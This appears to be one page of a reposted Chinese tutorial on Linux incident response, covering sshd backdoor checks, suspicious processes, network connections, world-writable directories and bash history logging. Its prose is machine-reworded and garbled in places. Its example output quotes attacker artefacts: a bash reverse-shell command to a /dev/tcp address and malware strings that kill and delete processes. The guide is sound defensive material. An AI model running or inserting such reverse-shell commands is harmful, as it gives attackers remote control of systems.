欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Linux系统安全危急反应知识探讨

来源:本站整理 作者:佚名 时间:2017-09-26 TAG: 我要投稿
3)strings反省/usr/sbin/sshd,看能否有邮箱信息
strings可以或许反省二进制文件中的字符串,在应急响应中是非常有用的。有些sshd后门会经由过程邮件发送登录信息,经由过程strings /usr/sbin/sshd可以或许反省到邮箱信息。
4)经由过程strace监控sshd过程读写文件的操纵
同样平常的sshd后门都邑将账户暗码记载到文件,可以或许经由过程strace过程跟踪到ssh登录暗码文件。
ps axu | grep sshd | grep -v grep
root 65530 0.0 0.1 48428 1260 ? Ss 13:43 0:00 /usr/sbin/sshd
strace -o aa -ff -p 65530
grep open aa* | grep -v -e No -e null -e denied| grep WR
aa.102586:open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 4
0x03 过程
反省能否存在可疑过程,必要把稳假如进击者获得到了Root权限,被植入内核或许体系层Rootkit的话,过程也会暗藏。
1)资本占用
Top而后找到CPU和MEM排序
2)启动光阴
可疑与后面找到的Webshell光阴点比对。
3)启动权限
这点很紧张,好比某次应急中发明木马过程都是mysql权限运行的,如下所示:
mysql 63763 45.3 0.0 12284 9616 ? R 01:18 470:54 ./db_temp/dazui.4
mysql 63765 0.0 0.0 12284 9616 ? S 01:18 0:01 ./db_temp/dazui.4
mysql 63766 0.0 0.0 12284 9616 ? S 01:18 0:37 ./db_temp/dazui.4
mysql 64100 45.2 0.0 12284 9616 ? R 01:20 469:07 ./db_temp/dazui.4
mysql 64101 0.0 0.0 12284 9616 ? S 01:20 0:01 ./db_temp/dazui.4
那根本可以或许断定是经由过程Mysql入侵,重点排查Mysql弱口令、UDF提权等。
4)父过程
比方我在菜刀中反弹Bash
[root@server120 html]# ps -ef | grep '/dev/tcp' | grep -v grep
apache 26641 1014 0 14:59 ? 00:00:00 sh -c /bin/sh -c "cd /root/apache-tomcat-6.0.32/webapps/ROOT/;bash -i >& /dev/tcp/192.168.192.144/2345 0>&1;echo [S];pwd;echo [E]" 2>&1
父过程过程号1014
[root@server120 html]# ps -ef | grep 1014
apache 1014 1011 0 Sep19 ? 00:00:00 /usr/sbin/httpd
可以或许看到父过程为apache,就可以或许断定进击者经由过程Web入侵。
获得到可疑过程号以后,可疑利用lsof -p pid反省相干文件和门路。
比方以前碰到的十字病毒,会改动ps和netstat表现的过程称号
udp 0 0 0.0.0.0:49937 0.0.0.0:* 131683/ls -la
udp 0 0 0.0.0.0:47584 0.0.0.0:* 116515/ifconfig
利用lsof -p pid可以或许看到可运行文件
[root@DataNode105 admin]# lsof -p 131683
CO妹妹AND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
hahidjqzx 131683 root cwd DIR 8,98 4096 18087937 /root
hahidjqzx 131683 root rtd DIR 8,98 4096 2 /
hahidjqzx 131683 root txt REG 8,98 625622 24123895 /usr/bin/hahidjqzxs
可以或许文件范例可以或许利用file获得;
[root@server120 tmp]# file .zl
zl: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
对付二进制的文件可以或许利用strings读取可读字符
[root@server120 tmp]# strings .zl
rm -f /boot/IptabLes ; rm -f /boot/.IptabLes ; rm -f /boot/IptabLex ; rm -f /boot/.IptabLex ; rm -f /usr
/IptabLes ; rm -f /usr/.IptabLes ; rm -f /usr/IptabLex ; rm -f /usr/.IptabLex
netstat -anp | grep "IptabLes" |awk '{print $NF}' |cut -d "/" -f 1 | xargs kill -9 > /dev/null ;free -m
> /dev/null
netstat -anp | grep "IptabLex" |awk '{print $NF}' |cut -d "/" -f 1 | xargs kill -9 > /dev/null ;free -m
> /dev/null
比方以前应急碰到的敕令调换,经由过程Strings反省发明有大批的IP地点。
[root@i-9kp9tipm log]# strings /usr/bin/.sshd | egrep '[1-9]{1,3}\.[1-9]{1,3}\.'
8.8.8.8
8.8.4.4
8.8.8.8
61.132.163.68
202.102.192.68
202.102.213.68
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
0x04 收集衔接
必要把稳假如进击者获得到了Root权限,被植入内核或许体系层Rootkit的话,衔接是可以或许被暗藏的。

netstat -antlp | grep ESTABLISHED
反省曾经树立的收集衔接,比方反弹bash
[root@server120 html]# netstat -antlp | grep EST | grep bash
tcp 0 0 192.168.192.120:41320 192.168.192.144:2345 ESTABLISHED 26643/bash
netstat -antlp | grep LISTEN
反省可以或许监听端口,比方进击者在当地开启sock5署理,而后利用SSH反弹sock5。
[root@server120 html]# netstat -antlp | grep LISTEN | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN 26810/python
lsof -i:{port}
0x05 敏感目次
/tmp, /var/tmp, /dev/shm,一切用户都可读,可写,可运行
[root@server120 ~]# ls -ald /tmp/
drwxrwxrwt. 10 root root 4096 9月 20 09:41 /tmp/
[root@server120 ~]# ls -ald /var/tmp/
drwxrwxrwt. 2 root root 4096 9月 18 16:57 /var/tmp/
[root@server120 ~]# ls -ald /dev/shm
drwxrwxrwt. 3 root root 60 9月 1 10:23 /dev/shm
0x06 history
默许的history仅记载运行的敕令,但是这些对付应急来讲是不敷的,许多体系加固剧本会增长记载敕令运行的光阴,改动记载的最大条数。以前写的对于Bash审计方法也很保举。从Bash4.1 版本开端,Bash开端支撑Rsyslog,
下载bash-4.4,下载地点: https://ftp.gnu.org/gnu/bash/
如今本机编译一份
1)改动bashhist.c:
改动771行

syslog (SYSLOG_FACILITY|SYSLOG_LEVEL, "PID=%d UID=%d User=%s Cmd=%s", getpid(), current_user.uid, current_user.user_name, line);

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载